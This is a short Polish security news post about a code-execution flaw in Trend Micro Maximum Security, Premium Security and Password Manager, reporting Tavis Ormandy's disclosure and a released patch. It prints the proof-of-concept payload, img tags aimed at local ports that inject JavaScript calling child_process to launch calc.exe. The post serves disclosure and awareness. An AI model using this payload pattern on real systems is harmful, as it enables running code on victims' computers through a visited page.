Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Trend Micro Maximum Security – można wykonywać kod w OS na komputerze ofiary… szybko patchujcie
Tavis – rozwalacz antywirusów – Ormandy tym razem tak napisał o trzech produktach Trend Micro:
Frankly, the issue is already ridiculously easy to discover and exploit though.
Tym razem chodzi o wykonanie kodu na komputerze ofiary, poprzez…odwiedzenie takiego obrazka:
<img src="http://localhost:40000/json/new/?javascript:require('child_process').spawnSync('calc.exe')
<img src="http://localhost:40001/json/new/?javascript:require('child_process').spawnSync('calc.exe')
<img src="http://localhost:40002/json/new/?javascript:require('child_process').spawnSync('calc.exe')
Podatne produkty:
* Trend Micro Maximum Security
* Trend Micro Premium Security
* Trend Micro Password Manager
Aktualizacja została co dopiero udostępniona.
–ms
Wiem że może to i kopanie leżącego, ale z jakimi uprawnieniami się taki kod wykonuje? Czyżby SYSTEM? :)